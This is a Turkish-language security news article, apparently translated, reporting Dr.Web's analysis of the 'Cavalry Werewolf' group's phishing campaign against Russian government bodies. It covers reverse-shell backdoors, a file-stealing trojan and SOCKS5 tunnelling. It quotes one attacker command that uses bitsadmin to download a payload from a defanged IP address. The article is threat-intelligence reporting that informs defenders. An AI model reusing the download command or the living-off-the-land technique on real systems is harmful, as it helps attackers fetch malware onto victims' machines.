Temmuz 2025’te Süvari Kurtadam olarak bilinen sofistike bir hacker grubu, koordineli kimlik avı operasyonları yoluyla kritik altyapıyı tehlikeye atarak Rus devlet kurumlarına karşı hedefli bir kampanya yürüttü.
Bu saldırının keşfi, kalıcı ağ erişimi oluşturmak, hassas verileri çıkarmak ve güvenliği ihlal edilmiş sistemler üzerinde uzun vadeli kontrolü sürdürmek için tasarlanmış karmaşık bir saldırı zincirini ortaya çıkarıyor.
Dr.Web güvenlik analistleri, hedeflenen bir devlet kuruluşunun temasa geçmesinin ardından, dahili kurumsal hesaplardan kaynaklanan şüpheli e-posta trafiğini tespit ederek, yetkisiz ağ erişimine işaret eden grubu belirledi.
Araştırma, çok aşamalı bir bulaşma süreci boyunca dağıtılan, daha önce bilinmeyen çok sayıda kötü amaçlı yazılım varyantını ortaya çıkardı.
Saldırganlar, açık kaynaklı araçlardan yararlanarak, şifreleme kullanarak ve birden fazla sunucuda komuta ve kontrol altyapısı kurarak karmaşık operasyonel güvenlik uygulamaları sergilediler.
Cephanelikleri, geleneksel güvenlik mekanizmalarını tetiklemeden uzaktan komut yürütülmesine olanak tanıyan çeşitli ters kabuk arka kapıları, veri hırsızlığı truva atları ve süreç enjeksiyon tekniklerini içerir.
Dr.Web güvenlik araştırmacıları, grubun farklı hedef ortamlara uyum sağlamak için araç setini sürekli olarak genişletmesiyle bu kampanyanın karmaşıklıkta önemli bir artışı temsil ettiğini belirtti.
Saldırı metodolojisi, uzaktan kabuk erişimi sağlayan, saldırganların komutları yürütmesine ve güvenliği ihlal edilmiş ağlarda kalıcılığı sürdürmesine olanak tanıyan arka kapıların konuşlandırılmasına odaklanır.
Bu yaklaşım, her hedef kuruluştaki keşif bulgularına dayalı olarak ek kötü amaçlı yazılım aşamalarının dağıtılması esnekliği sağlar.
İlk Erişim ve Birincil Enfeksiyon Vektörü
Süvari Kurtadam, resmi hükümet belgeleri gibi görünen, silahlı ekler içeren kimlik avı e-postaları aracılığıyla saldırılar başlatır.
.webp)
BackDoor.ShellNET.1 olarak tanımlanan birincil enfeksiyon aşaması, idari raporlar ve iç iletişimler gibi yanıltıcı dosya adlarıyla parola korumalı arşivlere ulaşır.
Reverse-Shell-CS açık kaynak yazılımını temel alan bu ters kabuk arka kapısı, yürütüldükten sonra saldırganların virüslü sistemlere uzaktan bağlanmasını ve rastgele komutlar yürütmesini sağlıyor.
İlk ele geçirmenin ardından saldırganlar, uzaktan komut yürütme yoluyla ek kötü amaçlı yükler indirmek için meşru Windows yardımcı programı Bitsadmin’den yararlanıyor.
Bu, meşru sistem araçlarının kötü amaçlı yazılım dağıtımı için vektör haline geldiği klasik bir arazide yaşama tekniğini temsil ediyor. Komut sözdizimi şu modeli izler: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe C:\users\public\downloads\winpot.exe.
Bu özel sıra, saldırganların ağ günlüklerinde genellikle meşru görünen standart Windows mekanizmalarını kullanarak operasyonel güvenliği nasıl koruduklarını gösterir.
Sonraki bulaşma aşamaları, Word dosyaları, Excel elektronik tabloları, PDF’ler ve görüntü dosyaları dahil olmak üzere yaygın formatlardaki belgeleri dışarı sızdırabilen Trojan.FileSpyNET.5 gibi dosya hırsızlığı truva atlarını ortaya çıkarır.
Saldırganlar daha sonra, göze çarpmayan uzaktan erişim ve komut yürütme için SOCKS5 tünelleri oluşturan ReverseSocks5 açık kaynak yazılımını temel alan BackDoor.Tunnel.41’i dağıtıyor.
Bu katmanlı yaklaşım, grubun güvenliği ihlal edilmiş altyapı içerisinde birden fazla erişim noktası bulundurmasına olanak tanıyarak, bireysel arka kapılar tespit edilip kaldırılsa bile kalıcılığın sağlanmasını sağlar.
Kampanya boyunca sergilenen teknik gelişmişlik, devlet kurumlarının karşı karşıya olduğu, gelişen tehdit ortamının altını çiziyor.
Meşru araçları, açık kaynak çerçeveleri ve özel kötü amaçlı yazılım modifikasyonlarını bir araya getiren Cavalry Werewolf, çeşitli hedef ortamlara uygun esnek komuta ve kontrol yapılarını korurken tespitten kaçınmak için tasarlanmış olgun bir operasyonel yetenek sergiliyor.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
